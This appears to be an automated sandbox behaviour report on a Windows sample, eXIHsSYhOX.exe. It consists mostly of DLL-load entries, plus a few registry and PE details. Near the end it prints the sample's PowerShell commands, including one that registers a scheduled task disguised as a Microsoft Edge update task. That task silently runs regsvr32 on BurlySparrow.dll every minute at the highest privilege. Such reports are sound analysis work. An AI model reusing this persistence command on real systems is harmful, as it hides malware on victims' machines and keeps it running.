Source: C:\Users\user\Desktop\eXIHsSYhOX.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\eXIHsSYhOX.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: winhttp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: wtsapi32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: winsta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: rstrtmgr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: ncrypt.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: ntasn1.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: dwmapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: explorerframe.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: sfc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: sfc_os.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: perfos.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\regsvr32.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: pdh.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: powrprof.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: umpdc.dll
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: perfos.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-TIG80.tmp\eXIHsSYhOX.tmpWindow found: window name: TMainFormJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JVB5Q.tmp\eXIHsSYhOX.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\File_is1Jump to behavior
Source: eXIHsSYhOX.exeStatic file information: File size 2495440 > 1048576
Source: eXIHsSYhOX.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Data Obfuscation

barindex
Suspicious powershell command line found
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{2F534156-472A-43D2-9350-94580B483BA3}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries) -RunLevel Highest"Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:INSTALL C:\Users\user\AppData\Roaming\BurlySparrow.dll' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 7_2_6C855C30 CreateTimerQueue,CreateEventW,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,CreateEventW,WaitForSingleObject,SetEvent,DeleteTimerQueue,7_2_6C855C30
Source: eXIHsSYhOX.exeStatic PE information: section name: .didata
Source: eXIHsSYhOX.tmp.0.drStatic PE information: section name: .didata
Source: eXIHsSYhOX.tmp.5.drStatic PE information: section name: .didata
Source: is-L5KBT.tmp.6.drStatic PE information: section name: .didata
Source: is-SF7GG.tmp.6.drStatic PE information: section name: .eh_fram
